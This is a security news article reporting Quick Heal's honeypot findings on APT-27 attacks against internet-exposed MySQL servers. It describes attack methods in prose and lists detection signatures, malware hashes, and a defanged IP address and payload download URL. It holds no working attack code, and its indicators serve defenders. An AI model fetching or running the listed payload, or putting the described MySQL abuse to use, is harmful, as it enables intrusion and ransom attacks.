Thursday, March 28, 2024

Hackers From Chinese APT-27 Group Initiated 15000 Attacks Against MySQL Servers to Compromise Enterprise Networks

Cybercriminals from APT-27 group targetting the high profile enterprise networks by exploiting MySQL server through malware such as NewCoreRAT(Remote Access Trojan) linked with Chinese APT Campaign.

Most of the enterprise networks relay with a cloud platform to store their sensitive data, at the same time attackers equally using cloud services to run their bots and C&C on cloud servers.

Even though enterprises patch all the vulnerabilities related to OS, they failed to secure the server machine running MySQL, which is open to the public Internet.

Based on the Shodan search result, there are nearly 4.9 million MySQL servers configured to run on public IP. The MySQL service runs with system privilege, so if an attacker enters into the network using MySQL then they can gain complete access to the infected machine without any vulnerability.

Researchers from Quick Heal observed nearly 15000 attacks in their honeypot system, in which, 34% of attack targeting Germany and rest of the attacks are focusing with other countries including United States, France, China, Poland, and Russia.

Threat Actors Different Approaches

Attackers using two different approaches to abuse the MYSQL servers and to compromise the associated enterprise network.

1 They try to get an entry into the database server, drop existing tables and insert a ransom note as a blob in a newly created table.

2. In the second attack approach, they use MySQL as an entrance into Linux or Windows system and then drop a backdoor, miner or ransomware into the victim host.

Threat actors are abusing the MYSQL server by exploiting the weakness such as default credentials like root, and brute force attack with 1000 well-known passwords and SQL injection.

Apart from this approach, attackers also make use of WebShell and authentication bypass vulnerability that allows them to take control over the server without any credential to manipulate the data and even delete it or steal it.

According to Quick Heal Research, Attackers use the function for download file from URL and execute them on the infected server. Every application executed by mysqld.exe will run with system privilege. They evade detection and can be used to launch file-less malware attacks.

Alongside, there are various malware distributed using MySQL as a source this include virus, backdoor, miner.

Researchers also received NewCore RAT sample from APT-27, Chinese APT actors mainly targeting government entities and data centers.

“After dropping the malicious database, the attacker inserts ransom note and ask for ransom. But it is suggested that in this type of attack, don’t pay the ransom as the attacker is not reading or taking a backup of database so there is no way that they can restore the database after payment.” Quick Head Reported.

Indicator of Compromise

IDS/IPS Detection:

MySQL/EXEFileWrite.UN!SP.34758
MySQL/CommandExecution.UN!SP.34759
MySQL/CommandExecution.UN!SP.34760
MySQL/EXEFileWrite.UN!SP.34776

Virus Protection Detection:


W32.Virut.G
Backdoor.Agent
Backdoor.Dofloo.CE99d
Trojan.Mauvaise.SL1
Trojan.Agent.S175662

Attack IOC’s:


D6362BDF13A789790E7CADCD110B9E4D
A5B019DDB693B0EC32B7A400957EDA24
c419cdd0dece9c183b3865b9c2db23fb
6F5E0882316C5BFE9420D91058F53BE8
F0044BCB4B1D4A6A39B766F864D9861A
19230C66AA4A550770D7C83BA8CC6027
B36150FEC88C917112B2C8801511C076
313909878C72ACA7E1D79CE221B1AC47

URL:

43[.]242[.]75[.]228
y[.]aibeichen[.]cn/csrss.exe

You can follow us on Linkedin, Twitter, Facebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep yourself updated.

Website

Latest articles

GoPlus’s Latest Report Highlights How Blockchain Communities Are Leveraging Critical API Security Data To Mitigate Web3 Threats

GoPlus Labs, the leading Web3 security infrastructure provider, has unveiled a groundbreaking report highlighting...

Wireshark 4.2.4 Released: What’s New!

Wireshark stands as the undisputed leader, offering unparalleled tools for troubleshooting, analysis, development, and...

Zoom Unveils AI-Powered All-In-One AI Work Workplace

Zoom has taken a monumental leap forward by introducing Zoom Workplace, an all-encompassing AI-powered...

iPhone Users Beware! Darcula Phishing Service Attacking Via iMessage

Phishing allows hackers to exploit human vulnerabilities and trick users into revealing sensitive information...

2 Chrome Zero-Days Exploited at Pwn2Own 2024: Patch Now

Google has announced a crucial update to its Chrome browser, addressing several vulnerabilities, including...

The Moon Malware Hacked 6,000 ASUS Routers in 72hours to Use for Proxy

Black Lotus Labs discovered a multi-year campaign by TheMoon malware targeting vulnerable routers and...
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles